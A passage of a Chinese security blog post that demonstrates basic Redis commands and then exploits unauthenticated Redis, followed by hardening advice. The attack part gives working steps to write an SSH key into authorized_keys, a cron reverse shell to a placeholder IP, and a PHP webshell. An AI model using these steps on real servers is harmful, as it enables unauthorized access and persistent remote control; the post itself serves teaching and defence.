</code></pre><h4 id="5-hlen-获取-hash-表中字段的数量"><a href="#5-hlen-获取-hash-表中字段的数量" class="headerlink" title="5.hlen 获取 hash 表中字段的数量"></a><strong>5.hlen 获取 hash 表中字段的数量</strong></h4><pre><code>127.0.0.1:6379&gt; hlen people
(integer) 3
</code></pre><h4 id="6-hkeys-获取所有的键值"><a href="#6-hkeys-获取所有的键值" class="headerlink" title="6.hkeys 获取所有的键值"></a><strong>6.hkeys 获取所有的键值</strong></h4><pre><code>127.0.0.1:6379&gt; hkeys people
1) &quot;name&quot;
2) &quot;age&quot;
3) &quot;school&quot;
</code></pre><h4 id="7-hvals-获取所有的值"><a href="#7-hvals-获取所有的值" class="headerlink" title="7.hvals 获取所有的值"></a><strong>7.hvals 获取所有的值</strong></h4><pre><code>127.0.0.1:6379&gt; hvals people
1) &quot;K0rz3n&quot;
2) &quot;20&quot;
3) &quot;xd&quot;
</code></pre><h3 id="4-有关-List-的命令"><a href="#4-有关-List-的命令" class="headerlink" title="4.有关 List 的命令"></a><strong>4.有关 List 的命令</strong></h3><h4 id="1-llen-获取列表的长度"><a href="#1-llen-获取列表的长度" class="headerlink" title="1.llen 获取列表的长度"></a><strong>1.llen 获取列表的长度</strong></h4><pre><code>127.0.0.1:6379&gt; llen list
(integer) 3
</code></pre><h4 id="2-lindex-通过索引获取列表中的元素"><a href="#2-lindex-通过索引获取列表中的元素" class="headerlink" title="2.lindex 通过索引获取列表中的元素"></a><strong>2.lindex 通过索引获取列表中的元素</strong></h4><pre><code>127.0.0.1:6379&gt; lindex list 1
&quot;K0rz3n&quot;
127.0.0.1:6379&gt; lindex list 0
&quot;name&quot;
127.0.0.1:6379&gt; lindex list 2
&quot;age&quot;
</code></pre><h4 id="3-lrange-获取列表指定范围内的元素"><a href="#3-lrange-获取列表指定范围内的元素" class="headerlink" title="3.lrange 获取列表指定范围内的元素"></a><strong>3.lrange 获取列表指定范围内的元素</strong></h4><pre><code>127.0.0.1:6379&gt; lrange list 0 2
1) &quot;name&quot;
2) &quot;K0rz3n&quot;
3) &quot;age&quot;
</code></pre><h4 id="4-linster-在元素的前或后插入元素"><a href="#4-linster-在元素的前或后插入元素" class="headerlink" title="4.linster 在元素的前或后插入元素"></a><strong>4.linster 在元素的前或后插入元素</strong></h4><p><strong>在前方插入</strong></p>
<pre><code>127.0.0.1:6379&gt; linsert list before name new_name
(integer) 4
127.0.0.1:6379&gt; lrange list 0 3
1) &quot;new_name&quot;
2) &quot;name&quot;
3) &quot;K0rz3n&quot;
4) &quot;age&quot;
</code></pre><p><strong>在后方插入</strong></p>
<pre><code>127.0.0.1:6379&gt; linsert list after name old_name
(integer) 5
127.0.0.1:6379&gt; lrange list 0 4
1) &quot;new_name&quot;
2) &quot;name&quot;
3) &quot;old_name&quot;
4) &quot;K0rz3n&quot;
5) &quot;age&quot;
</code></pre><h4 id="5-lpush-将一个或者多个值插入列表头部"><a href="#5-lpush-将一个或者多个值插入列表头部" class="headerlink" title="5.lpush 将一个或者多个值插入列表头部"></a><strong>5.lpush 将一个或者多个值插入列表头部</strong></h4><pre><code>127.0.0.1:6379&gt; lpush list hh
(integer) 6
127.0.0.1:6379&gt; lrange list 0 5
1) &quot;hh&quot;
2) &quot;new_name&quot;
3) &quot;name&quot;
4) &quot;old_name&quot;
5) &quot;K0rz3n&quot;
6) &quot;age&quot;
</code></pre><h4 id="6-lpop-移除并获取列表第一个元素"><a href="#6-lpop-移除并获取列表第一个元素" class="headerlink" title="6.lpop 移除并获取列表第一个元素"></a><strong>6.lpop 移除并获取列表第一个元素</strong></h4><pre><code>127.0.0.1:6379&gt; lpop list
&quot;hh&quot;
127.0.0.1:6379&gt; lrange list 0 10
1) &quot;new_name&quot;
2) &quot;name&quot;
3) &quot;old_name&quot;
4) &quot;K0rz3n&quot;
5) &quot;age&quot;
</code></pre><h4 id="7-rpush-将一个或者多个值插入列表尾部"><a href="#7-rpush-将一个或者多个值插入列表尾部" class="headerlink" title="7.rpush 将一个或者多个值插入列表尾部"></a><strong>7.rpush 将一个或者多个值插入列表尾部</strong></h4><pre><code>127.0.0.1:6379&gt; rpush list hh
(integer) 6
127.0.0.1:6379&gt; lrange list 0 10
1) &quot;new_name&quot;
2) &quot;name&quot;
3) &quot;old_name&quot;
4) &quot;K0rz3n&quot;
5) &quot;age&quot;
6) &quot;hh&quot;
</code></pre><h4 id="8-rpop-移除并获取列表最后一个元素"><a href="#8-rpop-移除并获取列表最后一个元素" class="headerlink" title="8.rpop 移除并获取列表最后一个元素"></a><strong>8.rpop 移除并获取列表最后一个元素</strong></h4><pre><code>127.0.0.1:6379&gt; rpop list
&quot;hh&quot;
127.0.0.1:6379&gt; lrange list 0 10
1) &quot;new_name&quot;
2) &quot;name&quot;
3) &quot;old_name&quot;
4) &quot;K0rz3n&quot;
5) &quot;age&quot;
</code></pre><h3 id="5-有关-Set-的命令"><a href="#5-有关-Set-的命令" class="headerlink" title="5.有关 Set 的命令"></a><strong>5.有关 Set 的命令</strong></h3><h4 id="1-sadd-向集合中添加一个或者多个成员"><a href="#1-sadd-向集合中添加一个或者多个成员" class="headerlink" title="1.sadd 向集合中添加一个或者多个成员"></a><strong>1.sadd 向集合中添加一个或者多个成员</strong></h4><pre><code>127.0.0.1:6379&gt; sadd set1 K0rz3n new old age
(integer) 4
</code></pre><h4 id="2-scard-返回集合的成员数"><a href="#2-scard-返回集合的成员数" class="headerlink" title="2.scard 返回集合的成员数"></a><strong>2.scard 返回集合的成员数</strong></h4><pre><code>127.0.0.1:6379&gt; scard set1
(integer) 4
</code></pre><h4 id="3-smembers-返回集合的所有成员"><a href="#3-smembers-返回集合的所有成员" class="headerlink" title="3.smembers 返回集合的所有成员"></a><strong>3.smembers 返回集合的所有成员</strong></h4><pre><code>127.0.0.1:6379&gt; smembers set1
1) &quot;new&quot;
2) &quot;age&quot;
3) &quot;old&quot;
4) &quot;K0rz3n&quot;
</code></pre><h4 id="4-sismember-判断是否是集合的成员"><a href="#4-sismember-判断是否是集合的成员" class="headerlink" title="4.sismember 判断是否是集合的成员"></a><strong>4.sismember 判断是否是集合的成员</strong></h4><pre><code>127.0.0.1:6379&gt; sismember set1 age
(integer) 1
127.0.0.1:6379&gt; sismember set1 hh
(integer) 0
</code></pre><h2 id="0X05-数据的备份与恢复"><a href="#0X05-数据的备份与恢复" class="headerlink" title="0X05 数据的备份与恢复"></a><strong>0X05 数据的备份与恢复</strong></h2><p>Redis SAVE 命令用于创建当前数据库的备份。</p>
<p>直接在命令行输入 save 就能在 config dir 指定的目录中创建一个 dump.rdb 文件</p>
<blockquote>
<p><strong>注意：</strong></p>
<p>创建 redis 备份文件也可以使用命令 BGSAVE，该命令在后台执行。</p>
</blockquote>
<h2 id="0X06-Redis-在渗透测试中的利用"><a href="#0X06-Redis-在渗透测试中的利用" class="headerlink" title="0X06 Redis 在渗透测试中的利用"></a><strong>0X06 Redis 在渗透测试中的利用</strong></h2><h3 id="1-Redis-未授权访问："><a href="#1-Redis-未授权访问：" class="headerlink" title="1.Redis 未授权访问："></a><strong>1.Redis 未授权访问：</strong></h3><h4 id="1-漏洞描述："><a href="#1-漏洞描述：" class="headerlink" title="1.漏洞描述："></a><strong>1.漏洞描述：</strong></h4><p>在特定条件下，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器，可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生，严重危害业务正常服务。部分 Redis 绑定在 0.0.0.0:6379，并且没有开启密码认证（这是Redis 的默认配置），如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，将会导致 Redis 服务直接暴露在公网上，导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。</p>
<h4 id="2-利用-Redis-获取敏感信息"><a href="#2-利用-Redis-获取敏感信息" class="headerlink" title="2.利用 Redis 获取敏感信息"></a><strong>2.利用 Redis 获取敏感信息</strong></h4><h5 id="1-Info"><a href="#1-Info" class="headerlink" title="(1)Info"></a><strong>(1)Info</strong></h5><p>如果 Redis 未授权访问成功(默认是空口令)，我们就能直接使用 Info 命令获取 Redis 以及系统的信息</p>
<p><strong>如题所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/redis%20%E4%BF%A1%E6%81%AF.png" alt="此处输入图片的描述"></p>
<h5 id="2-keys-get-key"><a href="#2-keys-get-key" class="headerlink" title="(2)keys * / get key"></a><strong>(2)keys * / get key</strong></h5><p>我们能获取所有的键以及对应的值（使用 keys *  和  get key 命令）</p>
<p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/key%20%E4%BF%A1%E6%81%AF.png" alt="此处输入图片的描述"></p>
<h4 id="3-写公钥直接-ssh-连接"><a href="#3-写公钥直接-ssh-连接" class="headerlink" title="3.写公钥直接 ssh 连接"></a><strong>3.写公钥直接 ssh 连接</strong></h4><h5 id="1-原理分析："><a href="#1-原理分析：" class="headerlink" title="1.原理分析："></a><strong>1.原理分析：</strong></h5><p>原理就是在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里，这样就可以再服务器端的/root/.ssh下生一个授权的key。</p>
<h5 id="2-大致的流程图如下"><a href="#2-大致的流程图如下" class="headerlink" title="2.大致的流程图如下"></a><strong>2.大致的流程图如下</strong></h5><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/redis%20%E5%86%99%E5%85%AC%E9%92%A51.png" alt="此处输入图片的描述"></p>
<h5 id="2-测试开始："><a href="#2-测试开始：" class="headerlink" title="2.测试开始："></a><strong>2.测试开始：</strong></h5><p>我在我的 vps 上开放了一个 docker 配置 redis 为未授权访问状态，将 docker 的 22 端口映射为 Vps 的 20002 端口，docker 的 6379 端口映射为 60009 端口</p>
<p><strong>1.首先在本地生成 ssh 公私钥</strong></p>
<pre><code>ssh-keygen -t rsa
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E7%94%9F%E6%88%90%E5%AF%86%E9%92%A5%E5%AF%B9.png" alt="此处输入图片的描述"></p>
<p><strong>2.将公钥导出为一个文件</strong></p>
<pre><code>(echo -e &quot;\n\n&quot;; cat id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; key.txt
</code></pre><p>这里的换行符是防止密钥数据和其他的 redis 缓存数据混合</p>
<p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E5%AF%BC%E5%87%BA%E4%B8%BA%E6%96%87%E4%BB%B6.png" alt="此处输入图片的描述"></p>
<p><strong>3.访问 redis 的同时将某个键的值设置为文件的内容</strong></p>
<pre><code>cat /root/.ssh/key.txt | ./redis-cli -h xxx.xxx.xxx.xxx -p 60009 -x set xxx
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E5%86%99%E5%85%A5%E9%94%AE%E5%80%BC.png" alt="此处输入图片的描述"></p>
<p><strong>4.改变 redis 的 RDB 目录以及文件为 /root/.ssh/authorized_keys</strong></p>
<pre><code>config set dir /root/.ssh

config set dbfilename authorized_keys
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E6%94%B9%E5%8F%98%E5%AD%98%E5%82%A8%E8%B7%AF%E5%BE%84.png" alt="此处输入图片的描述"></p>
<p>并且我们可以看到我们的 key.txt 已经存储在了 键为 hacker 的字符串 value 里面</p>
<p><strong>5.将缓存数据(key.txt 和其他的一些 redis 本身的缓存)写入磁盘文件</strong></p>
<pre><code>save
</code></pre><p><strong>6.成功无密码登录 docker</strong></p>
<p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E6%88%90%E5%8A%9F%E6%97%A0%E5%AF%86%E7%A0%81%E7%99%BB%E5%85%A5.png" alt="此处输入图片的描述"></p>
<p><strong>7.我们看一下写入的文件的内容</strong></p>
<p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E5%86%99%E5%85%A5%E7%9A%84%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9.png" alt="此处输入图片的描述"></p>
<h4 id="4-利用-crontable-反弹shell"><a href="#4-利用-crontable-反弹shell" class="headerlink" title="4.利用 crontable 反弹shell"></a><strong>4.利用 crontable 反弹shell</strong></h4><p>这个利用和上面的利用是一样的方法只不过是换了一下写入文件的路径以及写进去的内容</p>
<h5 id="1-端口监听"><a href="#1-端口监听" class="headerlink" title="1.端口监听"></a><strong>1.端口监听</strong></h5><p>我先在我另一台 vps 上监听 9999 端口</p>
<pre><code>nc -lvv 9999
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E7%AB%AF%E5%8F%A3%E7%9B%91%E5%90%AC.png" alt="此处输入图片的描述"></p>
<h5 id="2-设置某一个键的值为符合-crontable-格式的反弹-shell-一句话"><a href="#2-设置某一个键的值为符合-crontable-格式的反弹-shell-一句话" class="headerlink" title="2.设置某一个键的值为符合 crontable 格式的反弹 shell 一句话"></a><strong>2.设置某一个键的值为符合 crontable 格式的反弹 shell 一句话</strong></h5><pre><code>set hacker &quot;\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/xxx.xxx.xxx.xxx/9999 0&gt;&amp;1\n\n&quot;
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E8%AE%BE%E7%BD%AE%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1.png" alt="此处输入图片的描述"></p>
<h5 id="3-改变路径和文件名为-var-spool-cron-root"><a href="#3-改变路径和文件名为-var-spool-cron-root" class="headerlink" title="3.改变路径和文件名为 /var/spool/cron/root"></a><strong>3.改变路径和文件名为 /var/spool/cron/root</strong></h5><pre><code>config set dir /var/spool/cron
config set dbfilename root
save
</code></pre><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E8%AE%BE%E7%BD%AE%20cron%20%E8%B7%AF%E5%BE%84.png" alt="此处输入图片的描述"></p>
<h5 id="4-等待"><a href="#4-等待" class="headerlink" title="4.等待"></a><strong>4.等待</strong></h5><p>这里解释一下为什么要写成 root 因为/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名，比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。一般一个用户最多只有一个crontab文件。</p>
<h4 id="5-利用-Redis-写-webshell"><a href="#5-利用-Redis-写-webshell" class="headerlink" title="5. 利用 Redis 写 webshell"></a><strong>5. 利用 Redis 写 webshell</strong></h4><h5 id="1-概述"><a href="#1-概述" class="headerlink" title="1.概述"></a><strong>1.概述</strong></h5><p>我一开始也说了， redis 和 memcached 的很大区别就在于他能将数据持久化存储(虽然两个的侧重点都在缓存而不是将数据存储在硬盘上，但是他就是支持)，这个性质对我们来说是非常好的，我们可以利用这个写入磁盘的性质实现 写入我们的 shell </p>
<p>我之前提到了 <strong>RDB</strong> 和 <strong>AOF</strong> 这两个机制就是我们写文件的基础，RDB 像一个数据库备份文件，而AOF是一个log日志文件。我们可以设置让 redis 在指定时间、指定更改次数时进行备份，生成RDB文件；而设置AOF，可以在操作或时间过程后将“日志”写入一个文件的最末，当操作越来越多，则AOF文件越来越大。二者是相辅相成的，通过二者的配合我们能够稳定地持久地将数据存储于服务器上。</p>
<h5 id="2-测试"><a href="#2-测试" class="headerlink" title="2.测试"></a><strong>2.测试</strong></h5><p>这个 webshell 的写入方法非常的类似于 MYSQL 利用  general log 写 shell 的方式，如果你还不了解 mysql 的写入 shell 的方式 可以参考我的这篇文章 ：<a href="http://www.k0rz3n.com/2018/10/21/Mysql%20%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%88%A9%E7%94%A8/">Mysql 在渗透测试中的利用</a></p>
<h5 id="1-写入-webshell"><a href="#1-写入-webshell" class="headerlink" title="1.写入 webshell"></a><strong>1.写入 webshell</strong></h5><pre><code>127.0.0.1:6379&gt; config set dir E:/phpstudy/PHPTutorial/WWW/
OK
127.0.0.1:6379&gt; config set dbfilename redis.php
OK
127.0.0.1:6379&gt; set webshell &quot;&lt;?php phpinfo();?&gt;&quot;
OK
</code></pre><h4 id="2-访问测试"><a href="#2-访问测试" class="headerlink" title="2.访问测试"></a><strong>2.访问测试</strong></h4><p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E5%86%99shell.png" alt="此处输入图片的描述"></p>
<h2 id="0X07-如何防御"><a href="#0X07-如何防御" class="headerlink" title="0X07 如何防御"></a><strong>0X07 如何防御</strong></h2><h3 id="方法一：禁用高危命令（重启redis才能生效）"><a href="#方法一：禁用高危命令（重启redis才能生效）" class="headerlink" title="方法一：禁用高危命令（重启redis才能生效）"></a><strong>方法一：禁用高危命令（重启redis才能生效）</strong></h3><p>在 redis.conf 文件中直接将危险命令置空，或者改变其名字</p>
<pre><code>rename-command FLUSHALL &quot;&quot;
rename-command CONFIG &quot;&quot;
rename-command EVAL &quot;&quot;
</code></pre><p>或者</p>
<pre><code>rename-command FLUSHALL &quot;name1&quot;
rename-command CONFIG &quot;name2&quot;
rename-command EVAL &quot;name3&quot;
</code></pre><h3 id="方法二：以低权限运行-Redis-服务（重启redis才能生效）"><a href="#方法二：以低权限运行-Redis-服务（重启redis才能生效）" class="headerlink" title="方法二：以低权限运行 Redis 服务（重启redis才能生效）"></a><strong>方法二：以低权限运行 Redis 服务（重启redis才能生效）</strong></h3><p>我们知道进程的权限就是启动进程用户的权限，所以我们单独给 redis 开一个用户，这样不是 root 很多的操作都不能做了（方法类似于 apache 的降权运行防止 getshell 以后删除整站）</p>
<pre><code>groupadd -r redis   
useradd -r -g redis redis
</code></pre><h3 id="方法三：为-Redis-添加密码验证（重启redis才能生效）"><a href="#方法三：为-Redis-添加密码验证（重启redis才能生效）" class="headerlink" title="方法三：为 Redis 添加密码验证（重启redis才能生效）"></a><strong>方法三：为 Redis 添加密码验证（重启redis才能生效）</strong></h3><p>我觉得这个方法是最最核心的，因为默认的密码是空，然后不改的话就是直接被打</p>
<p>修改 redis.conf 文件，添加</p>
<pre><code>requirepass mypassword
</code></pre><h3 id="方法四：禁止外网访问-Redis（重启redis才能生效）"><a href="#方法四：禁止外网访问-Redis（重启redis才能生效）" class="headerlink" title="方法四：禁止外网访问 Redis（重启redis才能生效）"></a><strong>方法四：禁止外网访问 Redis（重启redis才能生效）</strong></h3><p>这个措施配合设置密码，一般来讲就没有什么大的问题， 就怕这个设置了结果密码没设置，万一出了 SSRF 照打不误</p>
<p>修改 redis.conf 文件，添加或修改，使得 Redis 服务只在当前主机可用（<strong>当然你设置成当前主机可用的话，安全性就更高了</strong>）</p>
<pre><code>bind 127.0.0.1
</code></pre><blockquote>
<p><strong>注意：</strong></p>
<p>在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错</p>
</blockquote>
<h3 id="方法五：修改默认端口"><a href="#方法五：修改默认端口" class="headerlink" title="方法五：修改默认端口"></a><strong>方法五：修改默认端口</strong></h3><p>这个方式就是不给攻击者试探的机会，反正就是增大了测试的难度</p>
<p>修改配置文件redis.conf文件</p>
<pre><code>Port 6379
</code></pre><h3 id="方法五：设置文件的隐藏属性"><a href="#方法五：设置文件的隐藏属性" class="headerlink" title="方法五：设置文件的隐藏属性"></a><strong>方法五：设置文件的隐藏属性</strong></h3><p>我们上面的利用中有一个利用的是修改 authorized_keys ，为了避免这种情况，我们需要控制这个文件无法被篡改，这就涉及到 Linux 中的文件的隐藏属性的知识点</p>
<h4 id="两个比较重要的命令："><a href="#两个比较重要的命令：" class="headerlink" title="两个比较重要的命令："></a><strong>两个比较重要的命令：</strong></h4><pre><code>chattr：change file attributes

lsattr：list file attributes
</code></pre><h4 id="两个比较重要的参数："><a href="#两个比较重要的参数：" class="headerlink" title="两个比较重要的参数："></a><strong>两个比较重要的参数：</strong></h4><h5 id="a-参数："><a href="#a-参数：" class="headerlink" title="a 参数："></a><strong>a 参数：</strong></h5><p>设置了a参数时，文件中将只能增加内容，不能删除数据，且不能打开文件进行任何编辑，哪怕是追加内容也不可以，所以像sed等需要打开文件的再写入数据的工具也无法操作成功。文件也不能被删除。只有root才能设置。</p>
<h5 id="i-参数："><a href="#i-参数：" class="headerlink" title="i 参数："></a><strong>i 参数：</strong></h5><p>设置了i参数时，文件将被锁定，不能向其中增删改内容，也不能删除修改文件等各种动作。只有root才能设置。可以将其理解为设置了i后，文件将是永恒不变的了，谁都不能动它。</p>
<p>将 authorized_keys 的权限设置为对拥有者只读，其他用户没有任何权限：</p>
<pre><code>chmod 400 ~/.ssh/authorized_keys
</code></pre><p>为保证 authorized_keys 的权限不会被改掉，您还需要设置该文件的 immutable 位权限:</p>
<pre><code>chattr +i ~/.ssh/authorized_keys
</code></pre><p>然而，用户还可以重命名 ~/.ssh，然后新建新的 ~/.ssh 目录和 authorized_keys<br>文件。要避免这种情况，需要设置 ~./ssh 的 immutable 权限：</p>
<pre><code>chattr +i ~/.ssh
</code></pre><h3 id="方法六：设置防火墙策略"><a href="#方法六：设置防火墙策略" class="headerlink" title="方法六：设置防火墙策略　　"></a><strong>方法六：设置防火墙策略</strong>　　</h3><p>如果正常业务中Redis服务需要被其他服务器来访问，可以设置iptables策略仅允许指定的IP来访问Redis服务</p>
<h2 id="0X07-总结"><a href="#0X07-总结" class="headerlink" title="0X07 总结"></a><strong>0X07 总结</strong></h2><p>本文主要是简单的介绍了一下 redi 并与其他类型数据库做了一些对比，利用 redis 能持久化存储的特性并结合 redis 的未授漏洞，尝试了几种不同的攻击方式，纸上得来终觉浅，绝知此事要躬行啊。 </p>
<h2 id="0X08-参考"><a href="#0X08-参考" class="headerlink" title="0X08 参考"></a><strong>0X08 参考</strong></h2><p><a href="https://www.jb51.net/article/118777.htm" target="_blank" rel="noopener">https://www.jb51.net/article/118777.htm</a><br><a href="https://www.freebuf.com/column/158065.html" target="_blank" rel="noopener">https://www.freebuf.com/column/158065.html</a><br><a href="https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html</a></p>
</div><div class="tags"><a href="/tags/Redis-备忘/">Redis 备忘</a></div><div class="post-nav"><a class="pre" href="/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/">一篇文章带你理解漏洞之 SSTI 漏洞</a><a class="next" href="/2018/11/07/关于 Shell 权限的一些探究/">关于 Shell 权限的一些探究</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="https://www.k0rz3n.com"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/APT/">APT</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/C-C/">C&C</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Kerberos/">Kerberos</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/learning/">learning</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/php/">php</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web安全/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/wireshark/">wireshark</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/备忘/">备忘</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/备忘-笔记/">备忘 笔记</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/学习思考/">学习思考</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具/">工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具使用/">工具使用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/开发/">开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/渗透测试/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞分析/">漏洞分析</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞研究/">漏洞研究</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/环境搭建/">环境搭建</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/编程/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/翻译/">翻译</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/论文/">论文</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/随笔/">随笔</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/PHP-备忘-笔记/" style="font-size: 15px;">PHP 备忘 笔记</a> <a href="/tags/工具-渗透测试/" style="font-size: 15px;">工具 渗透测试</a> <a href="/tags/备忘-反向代理-配置/" style="font-size: 15px;">备忘 反向代理 配置</a> <a href="/tags/开发-Github-备忘/" style="font-size: 15px;">开发 Github 备忘</a> <a href="/tags/配置-备忘/" style="font-size: 15px;">配置 备忘</a> <a href="/tags/Linux-渗透测试-备忘/" style="font-size: 15px;">Linux 渗透测试 备忘</a> <a href="/tags/网络安全-Python语法/" style="font-size: 15px;">网络安全 Python语法</a> <a href="/tags/编程-Python-进阶-备忘/" style="font-size: 15px;">编程 Python 进阶 备忘</a> <a href="/tags/gcc-备忘-笔记/" style="font-size: 15px;">gcc 备忘 笔记</a> <a href="/tags/Windows-FTP搭建-备忘/" style="font-size: 15px;">Windows FTP搭建 备忘</a> <a href="/tags/learning/" style="font-size: 15px;">learning</a> <a href="/tags/笔记/" style="font-size: 15px;">笔记</a> <a href="/tags/J2EE-基础/" style="font-size: 15px;">J2EE 基础</a> <a href="/tags/网络安全-Google-Hacking-信息收集-渗透测试/" style="font-size: 15px;">网络安全 Google Hacking 信息收集 渗透测试</a> <a href="/tags/前端/" style="font-size: 15px;">前端</a> <a href="/tags/随笔/" style="font-size: 15px;">随笔</a> <a href="/tags/PHP/" style="font-size: 15px;">PHP</a> <a href="/tags/web安全-漏洞-CTF/" style="font-size: 15px;">web安全  漏洞  CTF</a> <a href="/tags/学习发现/" style="font-size: 15px;">学习发现</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/CTF-Tools/" style="font-size: 15px;">CTF Tools</a> <a href="/tags/kali/" style="font-size: 15px;">kali</a> <a href="/tags/SQL/" style="font-size: 15px;">SQL</a> <a href="/tags/php/" style="font-size: 15px;">php</a> <a href="/tags/php语法/" style="font-size: 15px;">php语法</a> <a href="/tags/wireshark/" style="font-size: 15px;">wireshark</a> <a href="/tags/Linux-备忘/" style="font-size: 15px;">Linux 备忘</a> <a href="/tags/编程/" style="font-size: 15px;">编程</a> <a href="/tags/备忘-shell-Linux/" style="font-size: 15px;">备忘 shell Linux</a> <a href="/tags/备忘/" style="font-size: 15px;">备忘</a> <a href="/tags/网络安全-渗透测试-内网代理/" style="font-size: 15px;">网络安全 渗透测试 内网代理</a> <a href="/tags/工具使用/" style="font-size: 15px;">工具使用</a> <a href="/tags/渗透测试-局域网扫描/" style="font-size: 15px;">渗透测试 局域网扫描</a> <a href="/tags/备忘-dcoker-getshell-CTF/" style="font-size: 15px;">备忘 dcoker getshell CTF</a> <a href="/tags/渗透测试-技巧/" style="font-size: 15px;">渗透测试 技巧</a> <a href="/tags/网络安全-渗透测试-sqlmap/" style="font-size: 15px;">网络安全 渗透测试 sqlmap</a> <a href="/tags/静态检测/" style="font-size: 15px;">静态检测</a> <a href="/tags/APT/" style="font-size: 15px;">APT</a> <a href="/tags/转载/" style="font-size: 15px;">转载</a> <a href="/tags/Fuzz-XSS/" style="font-size: 15px;">Fuzz XSS</a> <a href="/tags/笔记-协议分析/" style="font-size: 15px;">笔记 协议分析</a> <a href="/tags/Redis-备忘/" style="font-size: 15px;">Redis 备忘</a> <a href="/tags/渗透测试-windows-后门/" style="font-size: 15px;">渗透测试 windows 后门</a> <a href="/tags/sql/" style="font-size: 15px;">sql</a> <a href="/tags/web安全-CTF-渗透测试-PHP/" style="font-size: 15px;">web安全 CTF 渗透测试 PHP</a> <a href="/tags/CSP/" style="font-size: 15px;">CSP</a> <a href="/tags/域渗透/" style="font-size: 15px;">域渗透</a> <a href="/tags/Java-备忘-笔记/" style="font-size: 15px;">Java 备忘 笔记</a> <a href="/tags/JSONP/" style="font-size: 15px;">JSONP</a> <a href="/tags/编程-C-类库/" style="font-size: 15px;">编程 C++ 类库</a> <a href="/tags/CTF-writeup/" style="font-size: 15px;">CTF writeup</a> <a href="/tags/web安全-CTF/" style="font-size: 15px;">web安全 CTF</a> <a href="/tags/java-备忘/" style="font-size: 15px;">java 备忘</a> <a href="/tags/web安全-MySQL-渗透测试/" style="font-size: 15px;">web安全 MySQL 渗透测试</a> <a href="/tags/编程-PHP-基础/" style="font-size: 15px;">编程 PHP 基础</a> <a href="/tags/网络安全-沙盒逃逸-Python/" style="font-size: 15px;">网络安全 沙盒逃逸 Python</a> <a href="/tags/SQL-语法/" style="font-size: 15px;">SQL 语法</a> <a href="/tags/web安全-漏洞分析/" style="font-size: 15px;">web安全 漏洞分析</a> <a href="/tags/漏洞研究/" style="font-size: 15px;">漏洞研究</a> <a href="/tags/网络安全-钓鱼-恶意代码分析-漏洞分析/" 